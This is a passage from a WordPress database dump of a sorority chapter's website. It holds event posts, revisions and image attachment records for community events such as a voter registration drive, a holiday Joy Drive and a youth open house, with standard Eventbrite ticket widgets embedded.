01:48:29','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/IMG_0728.jpg',0,'attachment','image/jpeg',0),(1321,1,'2018-09-15 01:00:51','2018-09-15 06:00:51','','Scholarship','','publish','closed','closed','','scholarship-3','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',0,'https://zphiblgz.org/?p=1321',5,'nav_menu_item','',0),(1322,1,'2018-09-15 02:08:13','2018-09-15 07:08:13','','Websitelogo','','inherit','closed','closed','','websitelogo','','','2018-09-15 02:08:13','2018-09-15 07:08:13','',6,'https://zphiblgz.org/wp-content/uploads/2018/09/Websitelogo.png',0,'attachment','image/png',0),(1323,1,'2018-09-15 02:18:25','2018-09-15 07:18:25','','whitezetalogo','','inherit','closed','closed','','whitezetalogo','','','2018-09-15 02:18:25','2018-09-15 07:18:25','',6,'https://zphiblgz.org/wp-content/uploads/2018/09/whitezetalogo.png',0,'attachment','image/png',0),(1324,1,'2018-09-15 02:30:13','2018-09-15 07:30:13','','Donate','','inherit','closed','closed','','donate','','','2018-09-15 02:30:13','2018-09-15 07:30:13','',6,'https://zphiblgz.org/wp-content/uploads/2018/09/Donate.png',0,'attachment','image/png',0),(1326,1,'2018-09-15 03:24:18','2018-09-15 08:24:18','','Ballbanner','','inherit','closed','closed','','ballbanner','','','2018-09-15 03:24:18','2018-09-15 08:24:18','',0,'https://zphiblgz.org/wp-content/uploads/2018/09/Ballbanner.png',0,'attachment','image/png',0),(1327,1,'2018-09-15 03:28:01','2018-09-15 08:28:01','','Kidsbanner','','inherit','closed','closed','','kidsbanner','','','2018-09-15 03:28:01','2018-09-15 08:28:01','',0,'https://zphiblgz.org/wp-content/uploads/2018/09/Kidsbanner.png',0,'attachment','image/png',0),(1331,8,'2018-09-26 10:05:19','2018-09-26 15:05:19','Voting is a right that so many people have fought and sacrificed for. LGZ understands the importance of that right and will be hosting our first Voter Registration Drive. Nearly 45 million people need to update their information and there are millions more who will become first-time voters in the upcoming mid-term elections.\r\n\r\n<img class=\"alignnone size-medium wp-image-1333\" src=\"https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistrationDrive-232x300.png\" alt=\"\" width=\"232\" height=\"300\" />','Voter Registration Drive','','draft','closed','open','','voter-registration-drive','','','2018-11-03 12:08:13','2018-11-03 17:08:13','',0,'https://zphiblgz.org/?post_type=event&#038;p=1331',0,'event','',0),(1332,8,'2018-09-26 09:36:14','2018-09-26 14:36:14','','VoterRegistration_Calendar','','inherit','closed','closed','','voterregistration_calendar','','','2018-09-26 09:36:14','2018-09-26 14:36:14','',1331,'https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistration_Calendar.png',0,'attachment','image/png',0),(1333,8,'2018-09-26 09:37:30','2018-09-26 14:37:30','','VoterRegistrationDrive','','inherit','closed','closed','','voterregistrationdrive','','','2018-09-26 09:37:30','2018-09-26 14:37:30','',1331,'https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistrationDrive.png',0,'attachment','image/png',0),(1334,8,'2018-09-26 09:40:01','2018-09-26 14:40:01','Voting is a right that so many people have fought and sacrificed for.\r\nLGZ understands the importance of that right and will be hosting our\r\nfirst Voter Registration Drive. Nearly 45 million people need to\r\nupdate their information and there are millions more who will become\r\nfirst-time voters in the upcoming mid-term elections.\r\n\r\n<img class=\"alignnone size-medium wp-image-1333\" src=\"https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistrationDrive-232x300.png\" alt=\"\" width=\"232\" height=\"300\" />','Voter Registration','','inherit','closed','closed','','1331-revision-v1','','','2018-09-26 09:40:01','2018-09-26 14:40:01','',1331,'https://zphiblgz.org/1331-revision-v1/',0,'revision','',0),(1335,8,'2018-09-26 10:05:19','2018-09-26 15:05:19','Voting is a right that so many people have fought and sacrificed for.\r\nLGZ understands the importance of that right and will be hosting our\r\nfirst Voter Registration Drive. Nearly 45 million people need to\r\nupdate their information and there are millions more who will become\r\nfirst-time voters in the upcoming mid-term elections.\r\n\r\n<img class=\"alignnone size-medium wp-image-1333\" src=\"https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistrationDrive-232x300.png\" alt=\"\" width=\"232\" height=\"300\" />','Voter Registration Drive','','inherit','closed','closed','','1331-revision-v1','','','2018-09-26 10:05:19','2018-09-26 15:05:19','',1331,'https://zphiblgz.org/1331-revision-v1/',0,'revision','',0),(1336,1,'2018-09-26 10:47:21','2018-09-26 15:47:21','Voting is a right that so many people have fought and sacrificed for. LGZ understands the importance of that right and will be hosting our first Voter Registration Drive. Nearly 45 million people need to update their information and there are millions more who will become first-time voters in the upcoming mid-term elections.\r\n\r\n<img class=\"alignnone size-medium wp-image-1333\" src=\"https://zphiblgz.org/wp-content/uploads/2018/09/VoterRegistrationDrive-232x300.png\" alt=\"\" width=\"232\" height=\"300\" />','Voter Registration Drive','','inherit','closed','closed','','1331-revision-v1','','','2018-09-26 10:47:21','2018-09-26 15:47:21','',1331,'https://zphiblgz.org/1331-revision-v1/',0,'revision','',0),(1338,8,'2018-11-03 12:32:22','2018-11-03 17:32:22','We’ve got spirit, how about you? Join the Pearlettes and Amicettes at\r\nChick-Fil-A (6375 Dobbin Rd, Columbia,MD) on Nov 14th from 5 pm-9pm\r\nfor Food and Fun! Bring the flyer when you place your order, and\r\n#TakeAStand.\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone size-medium wp-image-1342\" src=\"https://zphiblgz.org/wp-content/uploads/2018/11/Chicfila_SpiritNight-232x300.png\" alt=\"Chicfila_SpiritNight\" width=\"232\" height=\"300\" />','Spirit Night','','draft','closed','open','','spirit-night-3','','','2018-11-30 08:43:03','2018-11-30 13:43:03','',0,'https://zphiblgz.org/?post_type=event&#038;p=1338',0,'event','',0),(1339,8,'2018-11-03 12:26:57','2018-11-03 17:26:57','Give a little JOY and spread some holiday cheer! Help support the  \nladies of Lambda Gamma Zeta adopt a family for Thanksgiving and  \nChristmas.','Joy Drive (ZHOPE) (1)','','inherit','closed','closed','','joy-drive-zhope-1','','','2018-11-03 12:45:31','2018-11-03 17:45:31','',1338,'https://zphiblgz.org/wp-content/uploads/2018/11/Joy-Drive-ZHOPE-1.png',0,'attachment','image/png',0),(1340,8,'2018-11-03 12:27:04','2018-11-03 17:27:04','','Joydrive_Calendar','','inherit','closed','closed','','joydrive_calendar','','','2018-11-03 12:27:04','2018-11-03 17:27:04','',1338,'https://zphiblgz.org/wp-content/uploads/2018/11/Joydrive_Calendar.png',0,'attachment','image/png',0),(1341,8,'2018-11-03 12:27:09','2018-11-03 17:27:09','','SpiritNight_CalendarImage','','inherit','closed','closed','','spiritnight_calendarimage','','','2018-11-03 12:27:09','2018-11-03 17:27:09','',1338,'https://zphiblgz.org/wp-content/uploads/2018/11/SpiritNight_CalendarImage.png',0,'attachment','image/png',0),(1342,8,'2018-11-03 12:27:19','2018-11-03 17:27:19','We’ve got spirit, how about you? Join the Pearlettes and Amicettes at  \nChick-Fil-A (6375 Dobbin Rd, Columbia,MD) on Nov 14th from 5 pm-9pm  \nfor Food and Fun! Bring the flyer when you place your order, and  \n#TakeAStand.','Chicfila_SpiritNight','','inherit','closed','closed','','chicfila_spiritnight','','','2018-11-03 12:29:13','2018-11-03 17:29:13','',1338,'https://zphiblgz.org/wp-content/uploads/2018/11/Chicfila_SpiritNight.png',0,'attachment','image/png',0),(1343,8,'2018-11-03 12:32:22','2018-11-03 17:32:22','We’ve got spirit, how about you? Join the Pearlettes and Amicettes at\r\nChick-Fil-A (6375 Dobbin Rd, Columbia,MD) on Nov 14th from 5 pm-9pm\r\nfor Food and Fun! Bring the flyer when you place your order, and\r\n#TakeAStand.\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone size-medium wp-image-1342\" src=\"https://zphiblgz.org/wp-content/uploads/2018/11/Chicfila_SpiritNight-232x300.png\" alt=\"Chicfila_SpiritNight\" width=\"232\" height=\"300\" />','Spirit Night','','inherit','closed','closed','','1338-revision-v1','','','2018-11-03 12:32:22','2018-11-03 17:32:22','',1338,'https://zphiblgz.org/1338-revision-v1/',0,'revision','',0),(1344,8,'2018-11-03 12:48:05','2018-11-03 17:48:05','Give a little JOY and spread some holiday cheer! Help support the\r\nladies of Lambda Gamma Zeta adopt a family for Thanksgiving and\r\nChristmas.\r\n\r\nThere are <strong>TWO</strong> ways that you can help us this holiday season.\r\n\r\n1) Review the items needed on the Joy Drive flyer and reach out to a Soror from\r\nLGZ to schedule a time to pick up your items or\r\n\r\n2) Make a monetary donation at <a href=\"http://www.paypal.me/zphiblgz\" rel=\"noopener noreferrer\">http://www.paypal.me/zphiblgz</a>\r\n\r\nIf you have any questions contact Jontue Sumler at <a href=\"mailto:zhope@zphiblgz.org\">zhope@zphiblgz.org</a>.\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone size-medium wp-image-1339 aligncenter\" src=\"https://zphiblgz.org/wp-content/uploads/2018/11/Joy-Drive-ZHOPE-1-232x300.png\" alt=\"\" width=\"232\" height=\"300\" />','Joy Drive','','draft','closed','open','','joy-drive','','','2018-11-30 08:42:47','2018-11-30 13:42:47','',0,'https://zphiblgz.org/?post_type=event&#038;p=1344',0,'event','',0),(1345,8,'2018-11-03 12:48:05','2018-11-03 17:48:05','Give a little JOY and spread some holiday cheer! Help support the\r\nladies of Lambda Gamma Zeta adopt a family for Thanksgiving and\r\nChristmas.\r\n\r\nThere are <strong>TWO</strong> ways that you can help us this holiday season.\r\n\r\n1) Review the items needed on the Joy Drive flyer and reach out to a Soror from\r\nLGZ to schedule a time to pick up your items or\r\n\r\n2) Make a monetary donation at <a href=\"http://www.paypal.me/zphiblgz\" rel=\"noopener noreferrer\">http://www.paypal.me/zphiblgz</a>\r\n\r\nIf you have any questions contact Jontue Sumler at <a href=\"mailto:zhope@zphiblgz.org\">zhope@zphiblgz.org</a>.\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone size-medium wp-image-1339 aligncenter\" src=\"https://zphiblgz.org/wp-content/uploads/2018/11/Joy-Drive-ZHOPE-1-232x300.png\" alt=\"\" width=\"232\" height=\"300\" />','Joy Drive','','inherit','closed','closed','','1344-revision-v1','','','2018-11-03 12:48:05','2018-11-03 17:48:05','',1344,'https://zphiblgz.org/1344-revision-v1/',0,'revision','',0),(1347,1,'2018-11-30 08:40:20','2018-11-30 13:40:20','LGZ will be providing students taking the SAT exam at Wilde Lake High School with a quick and healthy breakfast. Research shows that students who have a healthy breakfast or snack before testing have better focus and perform better overall.\n\nBreakfast on the Go is an initiative under ZHope. For more information visit <a href=\"https://zphiblgz.org/zhope/breakfastonthego/\">https://zphiblgz.org/zhope/breakfastonthego/</a>\n\n&nbsp;','Breakfast on the Go','','inherit','closed','closed','','493-autosave-v1','','','2018-11-30 08:40:20','2018-11-30 13:40:20','',493,'https://zphiblgz.org/493-autosave-v1/',0,'revision','',0),(1349,1,'2018-12-01 10:49:19','2018-12-01 15:49:19','','ConwayBanner','','inherit','closed','closed','','conwaybanner','','','2018-12-01 10:49:19','2018-12-01 15:49:19','',0,'https://zphiblgz.org/wp-content/uploads/2018/12/ConwayBanner.png',0,'attachment','image/png',0),(1379,1,'2020-02-09 19:57:35','2020-02-10 00:57:35','','Empowerment summit','','inherit','closed','closed','','empowerment-summit','','','2020-02-09 19:57:35','2020-02-10 00:57:35','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/Empowerment-summit.jpg',0,'attachment','image/jpeg',0),(1365,6,'2020-01-18 21:48:41','2020-01-19 02:48:41','','IMG_0733','','inherit','closed','closed','','img_0733','','','2020-01-18 21:48:41','2020-01-19 02:48:41','',6,'https://zphiblgz.org/wp-content/uploads/2020/01/IMG_0733.jpg',0,'attachment','image/jpeg',0),(1364,6,'2020-01-18 21:42:22','2020-01-19 02:42:22','','IMG_2523','','inherit','closed','closed','','img_2523-2','','','2020-01-18 21:42:22','2020-01-19 02:42:22','',6,'https://zphiblgz.org/wp-content/uploads/2020/01/IMG_2523-1.jpg',0,'attachment','image/jpeg',0),(1358,6,'2020-01-18 21:01:19','2020-01-19 02:01:19','','IMG_0731','','inherit','closed','closed','','img_0731-3','','','2020-01-18 21:01:19','2020-01-19 02:01:19','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/IMG_0731-2.jpg',0,'attachment','image/jpeg',0),(1441,1,'2021-01-26 10:14:34','2021-01-26 15:14:34','Get GLAMMED up while staying masked up with Make-Up Artist Shantel Pinnock!\r\n[raw]\r\n<!-- Noscript content for added SEO -->\r\n<noscript><a href=\"https://abovethemask.eventbrite.com\" rel=\"noopener noreferrer\" target=\"_blank\"></noscript>\r\n<!-- You can customize this button any way you like -->\r\n<button id=\"eventbrite-widget-modal-trigger-137353661499\" type=\"button\">Buy Tickets</button>\r\n<noscript></a>Buy Tickets on Eventbrite</noscript>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        widgetType: \'checkout\',\r\n        eventId: \'137353661499\',\r\n        modal: true,\r\n        modalTriggerElementId: \'eventbrite-widget-modal-trigger-137353661499\',\r\n        onOrderComplete: exampleCallback\r\n    });\r\n</script>[/raw]','Above the Mask: Virtual Make-up Tutorial','','inherit','closed','closed','','1431-revision-v1','','','2021-01-26 10:14:34','2021-01-26 15:14:34','',1431,'https://zphiblgz.org/1431-revision-v1/',0,'revision','',0),(1360,6,'2020-01-18 21:14:36','2020-01-19 02:14:36','','Webp.net-resizeimage','','inherit','closed','closed','','webp-net-resizeimage','','','2020-01-18 21:14:36','2020-01-19 02:14:36','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/Webp.net-resizeimage.jpg',0,'attachment','image/jpeg',0),(1370,6,'2020-01-18 22:48:03','2020-01-19 03:48:03','','APPA2020','','inherit','closed','closed','','appa2020','','','2020-01-18 22:48:03','2020-01-19 03:48:03','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/APPA2020.png',0,'attachment','image/png',0),(1367,6,'2020-01-18 22:14:53','2020-01-19 03:14:53','','IMG_0727','','inherit','closed','closed','','img_0727','','','2020-01-18 22:14:53','2020-01-19 03:14:53','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/IMG_0727.jpg',0,'attachment','image/jpeg',0),(1453,1,'2021-09-22 09:24:59','2021-09-22 14:24:59','','lilletsig','','inherit','closed','closed','','lilletsig','','','2021-09-22 09:24:59','2021-09-22 14:24:59','',6,'https://zphiblgz.org/wp-content/uploads/2021/09/lilletsig.png',0,'attachment','image/png',0),(1431,1,'2021-01-26 09:44:50','2021-01-26 14:44:50','Attend a 90-minute makeup tutorial with Make-Up Artist Shantel Pinnock to get that glam look while still being safe wearing your mask.\r\n\r\nSuggested make-up toolkit items to have on hand during the event:\r\n\r\nVariety of face and eye brushes\r\nBeauty blender/sponge/makeup wedges\r\nFace primer\r\nConcealer (i.e. L.A. Girl Pro Conceal HD Concealer, Maybelline Instant Age Rewind Multi-Use Concealer Medium to Full Coverage, Maybelline Fit Me Liquid Concealer, MAC Pro Longwear Concealer, NARS Radiant Creamy Concealer)\r\nFoundation\r\nSetting or pressed powder\r\nEyeliner\r\nMascara\r\nPowder Contour Palette (i.e. Black Radiance Power contour palette)\r\nOptional:\r\n\r\nLipstick (preferably matte texture)\r\nLip liner\r\nHighlighter\r\nBlush\r\n\r\nEach ticket purchased will be entered into a raffle for one of the following GLAM prizes:\r\n\r\n$25 Ulta Beauty gift card\r\n$25 Sephora gift card\r\n30 minute one-on-one session with Shantel<a href=\"https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer.png\"><img src=\"https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer-200x300.png\" alt=\"\" width=\"200\" height=\"300\" class=\"alignnone size-medium wp-image-1432\" /></a>','Above the Mask: Virtual Make-up Tutorial','','publish','closed','open','','above-the-mask-virtual-make-up-tutorial','','','2021-01-26 19:03:21','2021-01-27 00:03:21','',0,'https://zphiblgz.org/?post_type=event&#038;p=1431',0,'event','',0),(1443,6,'2021-01-26 15:39:06','2021-01-26 20:39:06','Get GLAMMED up while staying masked up with Make-Up Artist Shantel Pinnock!\r\n[raw]\r\n<div style=\"width:195px; text-align:center;\" ><iframe  src=\"https://www.eventbrite.com/calendar-widget?eid=137353661499\" frameborder=\"0\" height=\"457\" width=\"195\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"no\" allowtransparency=\"true\"></iframe><div style=\"font-family:Helvetica, Arial; font-size:12px; padding:10px 0 5px; margin:2px; width:195px; text-align:center;\" ><a class=\"powered-by-eb\" style=\"color: #ADB0B6; text-decoration: none;\" target=\"_blank\" href=\"http://www.eventbrite.com/\" rel=\"noopener\">Powered by Eventbrite</a></div></div>[/raw]','Above the Mask: Virtual Make-up Tutorial','','inherit','closed','closed','','1431-revision-v1','','','2021-01-26 15:39:06','2021-01-26 20:39:06','',1431,'https://zphiblgz.org/1431-revision-v1/',0,'revision','',0),(1432,1,'2021-01-26 09:37:08','2021-01-26 14:37:08','','Above the Mask flyer','','inherit','closed','closed','','above-the-mask-flyer','','','2021-01-26 09:37:08','2021-01-26 14:37:08','',1431,'https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer.png',0,'attachment','image/png',0),(1374,6,'2020-01-18 23:05:44','2020-01-19 04:05:44','','Empowerment temp','','inherit','closed','closed','','empowerment-temp','','','2020-01-18 23:05:44','2020-01-19 04:05:44','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/Empowerment-temp.jpg',0,'attachment','image/jpeg',0),(1375,6,'2020-01-18 23:30:16','2020-01-19 04:30:16','','scholarship1','','inherit','closed','closed','','scholarship1','','','2020-01-18 23:30:16','2020-01-19 04:30:16','',797,'https://zphiblgz.org/wp-content/uploads/2020/01/scholarship1.png',0,'attachment','image/png',0),(1376,6,'2020-01-18 23:34:44','2020-01-19 04:34:44','','scholarship2','','inherit','closed','closed','','scholarship2','','','2020-01-18 23:34:44','2020-01-19 04:34:44','',797,'https://zphiblgz.org/wp-content/uploads/2020/01/scholarship2.png',0,'attachment','image/png',0),(1382,1,'2020-07-02 17:18:27','2020-07-02 22:18:27','','blue and white LW headshot','','inherit','closed','closed','','blue-and-white-lw-headshot','','','2020-07-02 17:18:27','2020-07-02 22:18:27','',6,'https://zphiblgz.org/wp-content/uploads/2020/07/blue-and-white-LW-headshot.jpg',0,'attachment','image/jpeg',0),(1384,1,'2020-07-07 11:21:34','2020-07-07 16:21:34','','reclaims','','inherit','closed','closed','','reclaims','','','2020-07-07 11:21:34','2020-07-07 16:21:34','',0,'https://zphiblgz.org/wp-content/uploads/2020/07/reclaims.jpg',0,'attachment','image/jpeg',0),(1390,2,'2020-07-08 11:20:31','2020-07-08 16:20:31','We are currently accepting applications for our youth programs! The purpose of our Youth Programs are to help young ladies grow culturally, socially, and educationally while impacting their\r\ncommunities.  We have programs for girls of all ages! Pearlettes (ages 4-8), Amicettes (ages 9-13), and Archonettes (ages 14-17).\r\n[raw]<div id=\"eventbrite-widget-container-110217495496\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'110217495496\',\r\n        iframeContainerId: \'eventbrite-widget-container-110217495496\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>[/raw]\r\n','Youth Open House','','draft','closed','open','','youth-open-house','','','2020-08-17 14:30:42','2020-08-17 19:30:42','',0,'https://zphiblgz.org/?post_type=event&#038;p=1390',0,'event','',0),(1387,1,'2020-07-07 11:27:13','2020-07-07 16:27:13','','chapter photo- smaller','','inherit','closed','closed','','chapter-photo-smaller','','','2020-07-07 11:27:13','2020-07-07 16:27:13','',0,'https://zphiblgz.org/wp-content/uploads/2020/07/chapter-photo-smaller.jpg',0,'attachment','image/jpeg',0),(1388,1,'2020-07-07 11:28:41','2020-07-07 16:28:41','','chapter photo- smaller','','inherit','closed','closed','','chapter-photo-smaller-2','','','2020-07-07 11:28:41','2020-07-07 16:28:41','',0,'https://zphiblgz.org/wp-content/uploads/2020/07/chapter-photo-smaller-1.jpg',0,'attachment','image/jpeg',0),(1398,1,'2020-07-08 11:14:23','2020-07-08 16:14:23','We are currently accepting applications for our youth programs! The purpose of our Youth Programs are to help young ladies grow culturally, socially, and educationally while impacting their\r\ncommunities.We have programs for girls of all ages! Pearlettes (ages 4-8), Amicettes (ages 9-13), and Archonettes (ages 14-17).\r\n[raw]<div id=\"eventbrite-widget-container-110217495496\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'110217495496\',\r\n        iframeContainerId: \'eventbrite-widget-container-110217495496\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>[/raw]\r\n','Youth Open House','','inherit','closed','closed','','1390-revision-v1','','','2020-07-08 11:14:23','2020-07-08 16:14:23','',1390,'https://zphiblgz.org/1390-revision-v1/',0,'revision','',0),(1435,1,'2021-01-26 19:01:50','2021-01-27 00:01:50','Attend a 90-minute makeup tutorial with Make-Up Artist Shantel Pinnock to get that glam look while still being safe wearing your mask.\r\n\r\nSuggested make-up toolkit items to have on hand during the event:\r\n\r\nVariety of face and eye brushes\r\nBeauty blender/sponge/makeup wedges\r\nFace primer\r\nConcealer (i.e. L.A. Girl Pro Conceal HD Concealer, Maybelline Instant Age Rewind Multi-Use Concealer Medium to Full Coverage, Maybelline Fit Me Liquid Concealer, MAC Pro Longwear Concealer, NARS Radiant Creamy Concealer)\r\nFoundation\r\nSetting or pressed powder\r\nEyeliner\r\nMascara\r\nPowder Contour Palette (i.e. Black Radiance Power contour palette)\r\nOptional:\r\n\r\nLipstick (preferably matte texture)\r\nLip liner\r\nHighlighter\r\nBlush\r\nEach ticket purchased will be entered into a raffle for one of following GLAM prizes:\r\n\r\n$25 Ulta Beauty gift card\r\n$25 Sephora gift card\r\n30 minute one-on-one session with Shantel','Above the Mask: Virtual Make-up Tutorial','','inherit','closed','closed','','1431-autosave-v1','','','2021-01-26 19:01:50','2021-01-27 00:01:50','',1431,'https://zphiblgz.org/1431-autosave-v1/',0,'revision','',0),(1449,1,'2021-01-26 19:03:21','2021-01-27 00:03:21','Attend a 90-minute makeup tutorial with Make-Up Artist Shantel Pinnock to get that glam look while still being safe wearing your mask.\r\n\r\nSuggested make-up toolkit items to have on hand during the event:\r\n\r\nVariety of face and eye brushes\r\nBeauty blender/sponge/makeup wedges\r\nFace primer\r\nConcealer (i.e. L.A. Girl Pro Conceal HD Concealer, Maybelline Instant Age Rewind Multi-Use Concealer Medium to Full Coverage, Maybelline Fit Me Liquid Concealer, MAC Pro Longwear Concealer, NARS Radiant Creamy Concealer)\r\nFoundation\r\nSetting or pressed powder\r\nEyeliner\r\nMascara\r\nPowder Contour Palette (i.e. Black Radiance Power contour palette)\r\nOptional:\r\n\r\nLipstick (preferably matte texture)\r\nLip liner\r\nHighlighter\r\nBlush\r\n\r\nEach ticket purchased will be entered into a raffle for one of the following GLAM prizes:\r\n\r\n$25 Ulta Beauty gift card\r\n$25 Sephora gift card\r\n30 minute one-on-one session with Shantel<a href=\"https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer.png\"><img src=\"https://zphiblgz.org/wp-content/uploads/2021/01/Above-the-Mask-flyer-200x300.png\" alt=\"\" width=\"200\" height=\"300\" class=\"alignnone size-medium wp-image-1432\" /></a>','Above the Mask: Virtual Make-up Tutorial','','inherit','closed','closed','','1431-revision-v1','','','2021-01-26 19:03:21','2021-01-27 00:03:21','',1431,'https://zphiblgz.org/1431-revision-v1/',0,'revision','',0),(1392,1,'2020-07-08 11:03:54','2020-07-08 16:03:54','We are currently accepting applications for our youth programs! The purpose of our Youth Programs are to help young ladies grow culturally, socially, and educationally while impacting their communities. We have programs for girls of all ages! Pearlettes (ages 4-8), Amicettes (ages 9-13), and Archonettes (ages 14-17).\r\n\r\n[raw]\r\n\r\n&lt;!-- Noscript content for added SEO --&gt;\r\n&lt;noscript&gt;&lt;a href=\"https://lgzyouth2020.eventbrite.com\" rel=\"noopener noreferrer\" target=\"_blank\"&gt;&lt;/noscript&gt;\r\n&lt;!-- You can customize this button any way you like --&gt;\r\n&lt;button id=\"eventbrite-widget-modal-trigger-110217495496\" type=\"button\"&gt;Buy Tickets&lt;/button&gt;\r\n&lt;noscript&gt;&lt;/a&gt;Buy Tickets on Eventbrite&lt;/noscript&gt;\r\n\r\n&lt;script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"&gt;&lt;/script&gt;\r\n\r\n&lt;script type=\"text/javascript\"&gt;\r\nvar exampleCallback = function() {\r\nconsole.log(\'Order complete!\');\r\n};\r\n\r\nwindow.EBWidgets.createWidget({\r\nwidgetType: \'checkout\',\r\neventId: \'110217495496\',\r\nmodal: true,\r\nmodalTriggerElementId: \'eventbrite-widget-modal-trigger-110217495496\',\r\nonOrderComplete: exampleCallback\r\n});\r\n&lt;/script&gt;[/raw]','Youth Open House','','inherit','closed','closed','','1390-revision-v1','','','2020-07-08 11:03:54','2020-07-08 16:03:54','',1390,'https://zphiblgz.org/1390-revision-v1/',0,'revision','',0),(1395,1,'2020-07-08 11:08:47','2020-07-08 16:08:47','','LGZ_YouthOpenHouse2020-finalsmall','','inherit','closed','closed','','lgz_youthopenhouse2020-finalsmall','','','2020-07-08 11:08:47','2020-07-08 16:08:47','',1390,'https://zphiblgz.org/wp-content/uploads/2020/07/LGZ_YouthOpenHouse2020-finalsmall.png',0,'attachment','image/png',0),(1396,1,'2020-07-08 11:09:44','2020-07-08 16:09:44','We are currently accepting applications for our youth programs! The purpose of our Youth Programs are to help young ladies grow culturally, socially, and educationally while impacting their communities. We have programs for girls of all ages! Pearlettes (ages 4-8), Amicettes (ages 9-13), and Archonettes (ages 14-17).\r\n\r\n[raw]&lt;!-- Noscript content for added SEO --&gt;\r\n&lt;noscript&gt;&lt;a href=\"https://lgzyouth2020.eventbrite.com\" rel=\"noopener noreferrer\" target=\"_blank\"&gt;&lt;/noscript&gt;\r\n&lt;!-- You can customize this button any way you like --&gt;\r\n&lt;button id=\"eventbrite-widget-modal-trigger-110217495496\" type=\"button\"&gt;Buy Tickets&lt;/button&gt;\r\n&lt;noscript&gt;&lt;/a&gt;Buy Tickets on Eventbrite&lt;/noscript&gt;\r\n\r\n&lt;script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"&gt;&lt;/script&gt;\r\n\r\n&lt;script type=\"text/javascript\"&gt;\r\nvar exampleCallback = function() {\r\nconsole.log(\'Order complete!\');\r\n};\r\n\r\nwindow.EBWidgets.createWidget({\r\nwidgetType: \'checkout\',\r\neventId: \'110217495496\',\r\nmodal: true,\r\nmodalTriggerElementId: \'eventbrite-widget-modal-trigger-110217495496\',\r\nonOrderComplete: exampleCallback\r\n});\r\n&lt;/script&gt;[/raw]','Youth Open House','','inherit','closed','closed','','1390-revision-v1','','','2020-07-08 11:09:44','2020-07-08 16:09:44','',1390,'https://zphiblgz.org/1390-revision-v1/',0,'revision','',0),(1397,1,'2020-07-08 11:13:42','2020-07-08 16:13:42','We are currently accepting applications for our youth programs! The purpose of our Youth Programs are to help young ladies grow culturally, socially, and educationally while impacting their\r\ncommunities.We have programs for girls of all ages! Pearlettes (ages 4-8), Amicettes (ages 9-13), and Archonettes (ages 14-17).\r\n[raw]<!-- Noscript content for added SEO -->\r\n<noscript><a href=\"https://lgzyouth2020.eventbrite.com\" rel=\"noopener noreferrer\" target=\"_blank\"></noscript>\r\n<!-- You can customize this button any way you like -->\r\n<button id=\"eventbrite-widget-modal-trigger-110217495496\" type=\"button\">Buy Tickets</button>\r\n<noscript></a>Buy Tickets on Eventbrite</noscript>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        widgetType: \'checkout\',\r\n        eventId: \'110217495496\',\r\n        modal: true,\r\n        modalTriggerElementId: \'eventbrite-widget-modal-trigger-110217495496\',\r\n        onOrderComplete: exampleCallback\r\n    });\r\n</script>[/raw]\r\n','Youth Open House','','inherit','closed','closed','','1390-revision-v1','','','2020-07-08 11:13:42','2020-07-08 16:13:42','',1390,'https://zphiblgz.org/1390-revision-v1/',0,'revision','',0),(1399,1,'2020-07-08 11:15:20','2020-07-08 16:15:20','We are currently accepting applications for our youth programs! The purpose of our Youth Programs are to help young ladies grow culturally, socially, and educationally while impacting their\r\ncommunities.  We have programs for girls of all ages! Pearlettes (ages 4-8), Amicettes (ages 9-13), and Archonettes (ages 14-17).\r\n[raw]<div id=\"eventbrite-widget-container-110217495496\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    